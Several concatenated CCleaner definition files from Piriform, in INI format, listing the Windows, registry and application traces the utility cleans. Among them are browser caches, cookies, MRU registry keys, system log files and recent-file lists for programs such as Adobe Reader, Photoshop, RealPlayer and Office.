NextIDValue=1034

;
; WARNING - DO NOT EDIT THIS FILE
; Copyright �2004-2008 Piriform Ltd, All Rights Reserved.
; This file and it's contents may not be copied or distributed
; without the express permission of the author.
;
; Notes
; ---------------------------------------
; LangSecRef
;  3001 = Internet Explorer
;  3002 = Windows Explorer
;  3003 = System
;  3004 = Advanced

[Temporary Internet Files]
ID=1001
LangSecRef=3001
LangRef=3101
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
SpecialKey1=N_INT_TEMP

[Cookies]
ID=1002
LangSecRef=3001
LangRef=3102
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
SpecialKey1=N_INT_COOKIES

[History]
ID=1003
LangSecRef=3001
LangRef=3103
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
SpecialKey1=N_INT_HISTORY

[Recently Typed URLs]
ID=1004
LangSecRef=3001
LangRef=3104
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
RegKey1=HKCU\Software\Microsoft\Internet Explorer\TypedURLs
RegKey2=HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
RegKey3=HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU

[Delete Index.dat files]
ID=1005
LangSecRef=3001
LangRef=3105
WarningRef=3201
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
SpecialKey1=N_INT_INDEXDAT

[Last Download Location]
ID=1006
LangSecRef=3001
LangRef=3108
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
Default=True
RegKey1=HKCU\Software\Microsoft\Internet Explorer|Download Directory
RegKey2=HKCU\Software\Microsoft\Internet Explorer\Main|Save Directory

[Autocomplete Form History]
ID=1007
LangSecRef=3001
LangRef=3106
WarningRef=3202
Detect=HKCU\SOFTWARE\Microsoft\Internet Explorer
SpecialKey1=N_INT_AUTOCOMPLETE

[Recent Documents]
ID=1008
LangSecRef=3002
LangRef=3121
Default=True
SpecialKey1=N_EX_RECENTDOCS
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

[Run (in Start Menu)]
ID=1009
LangSecRef=3002
LangRef=3122
Default=True
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

[Search Assistant Autocomplete]
ID=1010
LangSecRef=3002
LangRef=3123
Detect=HKCU\Software\Microsoft\Search Assistant
Default=True
RegKey1=HKCU\Software\Microsoft\Search Assistant\ACMru

[Other Explorer MRUs]
ID=1011
LangSecRef=3002
LangRef=3124
Default=True
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU
RegKey3=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\PrnPortsMRU
RegKey4=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
RegKey5=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions
RegKey6=HKLM\Software\Microsoft\Direct3D\MostRecentApplication|Name
RegKey7=HKCU\Software\Microsoft\Direct3D\MostRecentApplication|Name
RegKey8=HKLM\Software\Microsoft\DirectDraw\MostRecentApplication|Name
RegKey9=HKCU\Software\Microsoft\DirectInput\MostRecentApplication|Id
RegKey10=HKCU\Software\Microsoft\DirectInput\MostRecentApplication|Name
RegKey11=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
RegKey12=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths

[Empty Recycle Bin]
ID=1012
LangSecRef=3003
LangRef=3141
Default=True
SpecialKey1=N_TEMP_RECYCLEBIN

[Temporary Files]
ID=1013
LangSecRef=3003
LangRef=3142
Default=True
SpecialKey1=N_TEMP_DIRS

[Clipboard]
ID=1014
LangSecRef=3003
LangRef=3148
Default=True
SpecialKey1=N_TEMP_CLIPBOARD

[Memory Dumps]
ID=1015
LangSecRef=3003
LangRef=3143
Default=True
FileKey1=%windir%|memory.dmp
FileKey2=%windir%\MiniDump|*.dmp

[Chkdsk File Fragments]
ID=1016
LangSecRef=3003
LangRef=3144
Default=True
FileKey1=%SystemDrive%|File*.chk

[Windows Log Files]
ID=1017
LangSecRef=3003
LangRef=3145
Default=True
FileKey1=%windir%\system32\wbem\Logs|*.log
FileKey2=%windir%\system32\wbem\Logs|*.lo_
FileKey3=%windir%|*.log
FileKey4=%windir%|*.bak
FileKey5=%windir%|*log.txt
FileKey6=%commonappdata%\Microsoft\Dr Watson|*.log
FileKey7=%commonappdata%\Microsoft\Dr Watson|*.dmp
FileKey8=%windir%\Debug|*.log
FileKey9=%windir%\Debug\UserMode|*.log
FileKey10=%windir%\Debug\UserMode|*.bak
FileKey11=%windir%|SchedLgU.txt
FileKey12=%windir%\security\logs|*.log
FileKey13=%windir%\security\logs|*.old

[Windows Error Reporting]
ID=1018
LangSecRef=3003
LangRef=3149
Default=False
DetectOS=6.0
FileKey1=%ALLUSERSPROFILE%\Microsoft\Windows\WER\ReportArchive|*.*|RECURSE
FileKey2=%ALLUSERSPROFILE%\Microsoft\Windows\WER\ReportQueue|*.*|RECURSE
FileKey3=%USERPROFILE%\AppData\Local\Microsoft\Windows\WER\ReportArchive|*.*|RECURSE
FileKey4=%USERPROFILE%\AppData\Local\Microsoft\Windows\WER\ReportQueue|*.*|RECURSE

[DNS Cache]
ID=1032
LangSecRef=3003
LangRef=3150
DetectOS=5.0
Default=false
SpecialKey1=N_EX_DNS_CACHE

[Old Prefetch data]
ID=1019
LangSecRef=3004
LangRef=3147
Detect=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OptimalLayout
SpecialKey1=N_INT_PREFETCH

[Menu Order Cache]
ID=1020
LangSecRef=3004
LangRef=3125
WarningRef=3203
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder

[Tray Notifications Cache]
ID=1021
LangSecRef=3004
LangRef=3126
WarningRef=3204
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify|IconStreams
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify|PastIconsStream
RegKey3=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify|IconStreams
RegKey4=HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify|PastIconsStream

[Window Size/Location Cache]
ID=1022
LangSecRef=3004
LangRef=3127
WarningRef=3205
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams

[User Assist History]
ID=1023
LangSecRef=3004
LangRef=3128
WarningRef=3206
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count
RegKey2=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
RegKey3=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
RegKey4=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count

[IIS Log Files]
ID=1024
LangSecRef=3004
LangRef=3146
Detect=HKLM\System\CurrentControlSet\Services\w3svc
FileKey1=%windir%\system32\LogFiles|*.*|RECURSE
FileKey2=%SystemDrive%\inetpub\logs\LogFiles|*.*|RECURSE
ExcludeKey1=PATH|%windir%\system32\LogFiles\|SCM

[Hotfix Uninstallers]
ID=1025
LangSecRef=3004
LangRef=3130
DetectOS=|5.2
SpecialKey1=N_EX_HOTFIX

[Custom Folders]
ID=1026
LangSecRef=3004
LangRef=3129
SpecialKey1=N_EX_CUSTOMFOLDERS

[Start Menu Shortcuts]
ID=1027
LangSecRef=3003
LangRef=3612
Default=False
SpecialKey1=F_STARTMENU

[Desktop Shortcuts]
ID=1028
LangSecRef=3003
LangRef=3613
Default=False
SpecialKey1=F_DESKTOP

[Thumbnail Cache]
ID=1029
LangSecRef=3002
LangRef=3131
DetectOS=6.0
Default=true
SpecialKey1=N_EX_THUMBNAIL_CACHE
FileKey1=%LocalAppData%\Microsoft\Windows\Explorer|thumbcache_*.db
FileKey2=%LocalAppData%\Microsoft\Windows\Explorer\ThumbCacheToDelete|thm*.tmp

[Wipe Free Space]
ID=1030
LangSecRef=3004
LangRef=3132
WarningRef=3207
Default=False
DetectOS=5.0
SpecialKey1=N_EX_WIPE_MFT_FREE_SPACE
SpecialKey2=N_EX_WIPEFREESPACE


[Taskbar Jump Lists]
ID=1031
LangSecRef=3002
LangRef=3133
DetectOS=6.1
Default=true
SpecialKey1=N_EX_JUMP_LISTS


; CCleaner - Registry Cleaning file
; #Rev 2001
;
; WARNING - DO NOT EDIT THIS FILE
; Copyright �2004-2008 Piriform Ltd, All Rights Reserved.
; This file and it's contents may not be copied or distributed
; without the express permission of the author.

[Missing Shared DLLs]
LangSecRef=3501
LangRef=3601
Default=True
SpecialKey1=R_SHARED_DLLS

[Invalid File Extensions]
LangSecRef=3501
LangRef=3602
Default=True
SpecialKey1=R_FILE_EXTS

[ActiveX and Class Issues]
LangSecRef=3501
LangRef=3603
Default=True
SpecialKey1=R_ACTIVEX

[Interface]
LangSecRef=3501
LangRef=3615
Default=True
SpecialKey1=R_INTERFACE

[Applications]
LangSecRef=3501
LangRef=3604
Default=True
SpecialKey1=R_APP_OPENWITH

[Fonts]
LangSecRef=3501
LangRef=3605
Default=True
SpecialKey1=R_FONTS

[Application Paths]
LangSecRef=3501
LangRef=3606
Default=True
SpecialKey1=R_APP_PATHS

[Help Files]
LangSecRef=3501
LangRef=3607
Default=True
SpecialKey1=R_HELP

[Installer]
LangSecRef=3501
LangRef=3608
Default=True
SpecialKey1=R_INSTALLER

[Obsolete Software]
LangSecRef=3501
LangRef=3609
Default=True
SpecialKey1=R_OLDSOFTWARE

[Run At Startup]
LangSecRef=3501
LangRef=3610
Default=True
SpecialKey1=R_RUNSTARTUP

[Start Menu Ordering]
LangSecRef=3501
LangRef=3611
Default=True
SpecialKey1=R_STARTMENUORDER

[MUI Cache]
LangSecRef=3501
LangRef=3614
Default=True
SpecialKey1=R_MUICACHE

PA; CCleaner - Application Cleaning file

[Global]
Revision=2017
NextIDValue=2149

;
; WARNING - DO NOT EDIT THIS FILE
; If you would like to create custom entries then create a new file
; called winapp2.ini which follows the same format as this one.
; CCleaner will automatically pick up the new file.
;
; Copyright �2004-2009 Piriform Ltd, All Rights Reserved.
; This file and it's contents may not be copied or distributed
; without the express permission of the author.
;
; Notes
; ---------------------------------------
; LangSecRef
;  3021 = Applications
;  3022 = Internet
;  3023 = Multimedia
;  3024 = Utilities
;  3025 = Windows
;  3026 = Firefox/Mozilla
;  3027 = Opera
;  3028 = Safari

[Mozilla - Internet Cache]
ID=2001
LangSecRef=3026
LangRef=3161
Default=True
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_CACHE

[Mozilla - Internet History]
ID=2002
LangSecRef=3026
LangRef=3162
Default=True
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_HISTORY

[Mozilla - Download History]
ID=2003
LangSecRef=3026
LangRef=3163
Default=True
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_DOWNLOAD

[Mozilla - Cookies]
ID=2004
LangSecRef=3026
LangRef=3102
Default=True
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_COOKIES

[Mozilla - Saved Form Information]
ID=2005
LangSecRef=3026
LangRef=3164
Default=False
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_FORM

[Mozilla - Compact Databases]
ID=2146
LangSecRef=3026
LangRef=3165
Default=False
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_COMPACT_DATABASES

[Opera - Internet Cache]
ID=2006
LangSecRef=3027
LangRef=3161
Default=True
SpecialDetect=DET_OPERA
SpecialKey1=N_OPERA_CACHE

[Opera - Internet History]
ID=2007
LangSecRef=3027
LangRef=3162
Default=True
SpecialDetect=DET_OPERA
SpecialKey1=N_OPERA_HISTORY

[Opera - Cookies]
ID=2008
LangSecRef=3027
LangRef=3102
Default=False
SpecialDetect=DET_OPERA
SpecialKey1=N_OPERA_COOKIES

[Safari - Internet Cache]
ID=2009
LangSecRef=3028
LangRef=3161
Default=True
DetectFile=%ProgramFiles%\Safari\Safari.exe
FileKey1=%localappdata%\Apple Computer\Safari|Cache.db

[Safari - Internet History]
ID=2010
LangSecRef=3028
LangRef=3162
Default=True
DetectFile=%ProgramFiles%\Safari\Safari.exe
FileKey1=%appdata%\Apple Computer\Safari|History.plist
FileKey2=%appdata%\Apple Computer\Safari|Downloads.plist
FileKey3=%localappdata%\Apple Computer\Safari\History|*.*
FileKey4=%localappdata%\Apple Computer\Safari\Webpage Previews|*.*|RECURSE

[Safari - Cookies]
ID=2011
LangSecRef=3028
LangRef=3102
Default=True
DetectFile=%ProgramFiles%\Safari\Safari.exe
FileKey1=%appdata%\Apple Computer\Safari\Cookies|Cookies.plist

[Safari - Saved Form Information]
ID=2012
LangSecRef=3028
LangRef=3164
Default=False
DetectFile=%ProgramFiles%\Safari\Safari.exe
FileKey1=%appdata%\Apple Computer\Safari|Form Values.plist

[Google Chrome - Internet Cache]
ID=2013
Section=Google Chrome
LangRef=3161
Default=True
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_CACHE

[Google Chrome - Internet History]
ID=2014
Section=Google Chrome
LangRef=3162
Section = Chrome
Default=True
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_HISTORY

[Google Chrome - Download History]
ID=2015
Section=Google Chrome
LangRef=3163
Default=True
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_DOWNLOAD

[Google Chrome - Cookies]
ID=2016
Section=Google Chrome
LangRef=3102
Default=True
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_COOKIES

[Google Chrome - Saved Form Information]
ID=2017
Section=Google Chrome
LangRef=3164
Default=False
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_FORM

[Google Chrome - Compact Databases]
ID=2147
Section=Google Chrome
LangRef=3165
Default=False
DetectFile=%localappdata%\Google\Chrome\Application\chrome.exe
DetectFile2=%ProgramFiles%\Google\Chrome\Application\chrome.exe
SpecialKey1=N_CHROME_COMPACT_DATABASES

[Adobe Acrobat Reader 5.0]
ID=2018
LangSecRef=3021
Detect=HKCU\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
Default=True
RegKey1=HKCU\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles

[Adobe Acrobat Reader 6.0]
ID=2019
LangSecRef=3021
Detect=HKCU\Software\Adobe\Acrobat Reader\6.0\AVGeneral
Default=True
RegKey1=HKCU\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles

[Adobe Acrobat Reader 7.0]
ID=2020
LangSecRef=3021
Detect=HKCU\Software\Adobe\Acrobat Reader\7.0\AVGeneral
Default=True
RegKey1=HKCU\Software\Adobe\Acrobat Reader\7.0\AVGeneral\cRecentFiles
FileKey1=%localappdata%\Adobe\Acrobat\7.0\Cache\Search70|*.*
FileKey2=%ProgramFiles%\Adobe\Acrobat 7.0\Reader|*.bak
FileKey3=%ProgramFiles%\Adobe\Acrobat 7.0\ActiveX|*.bak
FileKey4=%ProgramFiles%\Adobe\Acrobat 7.0\Reader\plug_ins|*.bak
FileKey5=%ProgramFiles%\Adobe\Acrobat 7.0\Reader\Updater|*.bak

[Adobe Reader 8.0]
ID=2021
LangSecRef=3021
Detect=HKCU\Software\Adobe\Acrobat Reader\8.0\AVGeneral
Default=True
RegKey1=HKCU\Software\Adobe\Acrobat Reader\8.0\AVGeneral\cRecentFiles
FileKey1=%localappdata%\Adobe\Acrobat\8.0\Cache\Search80|*.*

[Adobe Reader 9.0]
ID=2137
LangSecRef=3021
Detect=HKCU\Software\Adobe\Acrobat Reader\9.0\AVGeneral
Default=True
RegKey1=HKCU\Software\Adobe\Acrobat Reader\9.0\AVGeneral\cRecentFiles
FileKey1=%localappdata%\Adobe\Acrobat\9.0\Cache\Search90|*.*

[Adobe Acrobat 8.0]
ID=2022
LangSecRef=3021
Detect=HKCU\Software\Adobe\Adobe Acrobat\8.0\AVGeneral
Default=True
RegKey1=HKCU\Software\Adobe\Adobe Acrobat\8.0\AVGeneral\cRecentFiles

[Adobe ImageReady 7.0]
ID=2023
LangSecRef=3021
Default=True
Detect=HKCU\Software\Adobe\ImageReady 7.0
RegKey1=HKCU\Software\Adobe\ImageReady 7.0\Preferences\URLHistory
RegKey2=HKCU\Software\Adobe\ImageReady 7.0\Preferences|SaveDir
RegKey3=HKCU\Software\Adobe\ImageReady 7.0\Preferences\RecentFiles

[Adobe Photoshop 6.0]
ID=2024
LangSecRef=3021
Default=True
Detect=HKCU\Software\Adobe\Photoshop\6.0
RegKey1=HKCU\Software\Adobe\Photoshop\6.0\VisitedDirs

[Adobe Photoshop 7.0]
ID=2025
LangSecRef=3021
Default=True
Detect=HKCU\Software\Adobe\Photoshop\7.0
RegKey1=HKCU\Software\Adobe\Photoshop\7.0\VisitedDirs

[Adobe Photoshop CS]
ID=2026
LangSecRef=3021
Default=True
Detect=HKCU\Software\Adobe\Photoshop\8.0
RegKey1=HKCU\Software\Adobe\Photoshop\8.0\VisitedDirs

[Adobe Photoshop CS2]
ID=2027
LangSecRef=3021
Detect=HKCU\Software\Adobe\Photoshop\9.0
Default=True
RegKey1=HKCU\Software\Adobe\Photoshop\9.0\VisitedDirs
RegKey2=HKCU\Software\Adobe\MediaBrowser\MRU\Photoshop\FileList
FileKey1=%appdata%\Adobe\CameraRaw\Cache|*.*

[Adobe Photoshop CS3]
ID=2139
LangSecRef=3021
Detect=HKCU\Software\Adobe\Photoshop\10.0
Default=True
RegKey1=HKCU\Software\Adobe\Photoshop\10.0\VisitedDirs

[Adobe Photoshop CS4]
ID=2140
LangSecRef=3021
Detect=HKCU\Software\Adobe\Photoshop\11.0
Default=True
RegKey1=HKCU\Software\Adobe\Photoshop\11.0\VisitedDirs
RegKey2=HKCU\Software\Adobe\MediaBrowser\MRU\Photoshop\FileList

[Adobe Illustrator CS4]
ID=2144
LangSecRef=3021
Detect=HKCU\Software\Adobe\MediaBrowser\MRU\illustrator
Default=True
RegKey1=HKCU\Software\Adobe\MediaBrowser\MRU\illustrator\FileList

[Yahoo Toolbar]
ID=2028
LangSecRef=3022
Detect=HKCU\Software\Yahoo\Companion
Default=True
RegKey1=HKCU\Software\Yahoo\Companion\SearchHistory

[Windows Live Toolbar]
ID=2029
LangSecRef=3022
Detect=HKCU\Software\Microsoft\MSN Apps\SearchBox
Default=True
RegKey1=HKCU\Software\Microsoft\MSN Apps\SearchBox|History
RegKey2=HKCU\Software\Microsoft\MSN Apps\MSN Toolbar|SearchStrings

[Google Toolbar]
ID=2030
LangSecRef=3022
Detect=HKCU\Software\Google\NavClient\1.1
Default=True
RegKey1=HKCU\Software\Google\NavClient\1.1\History
RegKey2=HKCU\Software\Google\NavClient\1.1\Options|KillPopupCount

[Google Toolbar 4.0]
ID=2031
LangSecRef=3022
Detect=HKCU\Software\Google\Google Toolbar
Default=True
FileKey1=%appdata%\Google\Local Search History|*.*

[Google Deskbar]
ID=2032
LangSecRef=3022
Detect=HKCU\Software\Google\Deskbar
Default=True
RegKey1=HKCU\Software\Google\Deskbar\termhistory
RegKey2=HKCU\Software\Google\Deskbar\urlhistory

[Windows Media Player]
ID=2033
LangSecRef=3023
Detect=HKCU\Software\Microsoft\MediaPlayer\Player
Default=True
RegKey1=HKCU\Software\Microsoft\MediaPlayer\Player\RecentFileList
RegKey2=HKCU\Software\Microsoft\MediaPlayer\Player\RecentURLList
RegKey3=HKCU\Software\Microsoft\MediaPlayer\Preferences|LastPlayList
RegKey4=HKCU\Software\Microsoft\MediaPlayer\Preferences|LastPlayListIndex
RegKey5=HKCU\Software\Microsoft\MediaPlayer\Player\Settings|SaveAsDir
RegKey6=HKCU\Software\Microsoft\MediaPlayer\AutoComplete\MediaEdit
RegKey7=HKCU\Software\Microsoft\MediaPlayer\Radio\MRUList

[Real Player]
ID=2034
LangSecRef=3023
Detect=HKCU\Software\RealNetworks\RealPlayer\6.0
Default=True
RegKey1=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins1
RegKey10=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins2
RegKey11=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins3
RegKey12=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins4
RegKey13=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins5
RegKey14=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins6
RegKey15=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins7
RegKey16=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins8
RegKey17=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastOpenFileDir
RegKey18=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips1
RegKey19=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips2
RegKey20=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips3
RegKey21=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips4
RegKey22=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips5
RegKey23=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips6
RegKey24=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips7
FileKey1=%appdata%\Real\RealOne Player|cookies.txt
FileKey2=%appdata%\Real\RealOne Player|ctd.dat
FileKey3=%appdata%\Real\RealOne Player|realplayer.ste
FileKey4=%appdata%\Real\RealOne Player\History|*.*
FileKey5=%appdata%\Real\RealPlayer|cookies.txt
FileKey6=%appdata%\Real\RealPlayer|ctd.dat
FileKey7=%appdata%\Real\RealPlayer|realplayer.ste
FileKey8=%appdata%\Real\RealPlayer\History|*.*
FileKey9=%ProgramFiles%\Common Files\Real\Update_OB|RealPlayer-log.txt

[Quicktime Player]
ID=2035
LangSecRef=3023
Detect=HKLM\Software\Apple Computer, Inc.\QuickTime
Default=True
RegKey1=HKLM\Software\Apple Computer, Inc.\QuickTime\Recent Movies
FileKey1=%userprofile%|QTPlayerSession.xml
FileKey2=%appdata%\Apple Computer\QuickTime|QTPlayerSession.xml

[Quicktime Player Cache]
ID=2036
LangSecRef=3023
Detect=HKLM\Software\Apple Computer, Inc.\QuickTime
Default=True
FileKey1=%localappdata%\Apple Computer\QuickTime\downloads|*.*|RECURSE

[AVI Preview]
ID=2037
LangSecRef=3023
Detect=HKCU\Software\Andrei Jefremov\AVIPreview by Andrei Jefremov, visit www.avipreview.com for more
Default=True
RegKey1=HKCU\Software\Andrei Jefremov\AVIPreview by Andrei Jefremov, visit www.avipreview.com for more\Recent File List

[XML Spy]
ID=2038
LangSecRef=3021
Detect=HKCU\Software\Altova\XML Spy
Default=True
RegKey1=HKCU\Software\Altova\XML Spy\Recent File List
RegKey2=HKCU\Software\Altova\XML Spy\Recent Project List

[SWiSH]
ID=2039
LangSecRef=3023
Detect=HKCU\Software\DJJ Holdings\SWiSH
Default=True
RegKey1=HKCU\Software\DJJ Holdings\SWiSH\Recent File List

[Paint Shop Pro 7.0]
ID=2040
LangSecRef=3023
Detect=HKCU\Software\Jasc\Paint Shop Pro 7
Default=True
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 7\Recent File List
RegKey2=HKCU\Software\Jasc\Animation Shop 3\Recent File List
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 7\General|FolderHistory
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 7\General|SaveAsDirectory
RegKey5=HKCU\Software\Jasc\Paint Shop Pro 7\General|SaveCopyDirectory

[Paint Shop Pro 8.0]
ID=2041
LangSecRef=3023
Detect=HKCU\Software\Jasc\Paint Shop Pro 8
Default=True
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 8\Recent File List
RegKey2=HKCU\Software\Jasc\Paint Shop Pro 8\WorkspaceMRU
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdPyScript\RunScript|FileName
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdFile\FileSaveAs|FileFolder
RegKey5=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdNonGraphic\SaveWorkspace|WorkspaceFilename
RegKey6=HKCU\Software\Jasc\Paint Shop Pro 8\ScriptMRU

[Paint Shop Pro 9.0]
ID=2042
LangSecRef=3023
Detect=HKCU\Software\Jasc\Paint Shop Pro 9
Default=True
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 9\Recent File List
RegKey2=HKCU\Software\Jasc\Paint Shop Pro 9\WorkspaceMRU
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 9\JascCmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 9\JascCmdFile\FileOpen|Folder

[Paint Shop Pro X]
ID=2043
LangSecRef=3023
Detect=HKCU\Software\Corel\Paint Shop Pro\10
Default=True
RegKey1=HKCU\Software\Corel\Paint Shop Pro\10\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\10\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\10\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\10\CmdFile\FileOpen|Folder

[Paint Shop Pro XI]
ID=2044
LangSecRef=3023
Detect=HKCU\Software\Corel\Paint Shop Pro\11
Default=True
RegKey1=HKCU\Software\Corel\Paint Shop Pro\11\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\11\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\11\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\11\CmdFile\FileOpen|Folder

[Paint Shop Pro X2]
ID=2148
LangSecRef=3023
Detect=HKCU\Software\Corel\Paint Shop Pro\12
Detect2=HKCU\Software\Corel\Paint Shop Pro\12.5
Default=True
RegKey1=HKCU\Software\Corel\Paint Shop Pro\12\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\12\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\12\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\12\CmdFile\FileOpen|Folder
RegKey5=HKCU\Software\Corel\Paint Shop Pro\12.5\Recent File List
RegKey6=HKCU\Software\Corel\Paint Shop Pro\12.5\WorkspaceMRU
RegKey7=HKCU\Software\Corel\Paint Shop Pro\12.5\CmdFile\FileSaveAs|FileFolder
RegKey8=HKCU\Software\Corel\Paint Shop Pro\12.5\CmdFile\FileOpen|Folder

[MS Works 4.0]
ID=2045
LangSecRef=3021
Detect= HKCU\Software\Microsoft\Works\4.0
Default=True
RegKey1=HKCU\Software\Microsoft\Works\4.0\Recent File List

[Office 97]
ID=2046
LangSecRef=3021
Detect=HKCU\Software\Microsoft\Office\8.0\Common
Default=True
FileKey1=%appdata%\Microsoft\Office\Recent|*.*
RegKey1=HKCU\Software\Microsoft\Office\8.0\Excel\Recent File List
RegKey2=HKCU\Software\Microsoft\Office\8.0\Project\Recent File List
RegKey3=HKCU\Software\Microsoft\Office\8.0\PowerPoint\Recent File List
RegKey4=HKCU\Software\Microsoft\Office\8.0\PowerPoint\Recent Folder List
RegKey5=HKCU\Software\Microsoft\Office\8.0\Common\Internet\LocationOfComponents
RegKey6=HKCU\Software\Microsoft\Office\8.0\Access\Settings

[Office XP]
ID=2047
LangSecRef=3021
Detect=HKCU\Software\Microsoft\Office\10.0\Common
Default=True
FileKey1=%appdata%\Microsoft\Office\Recent|*.*
RegKey1=HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent File List
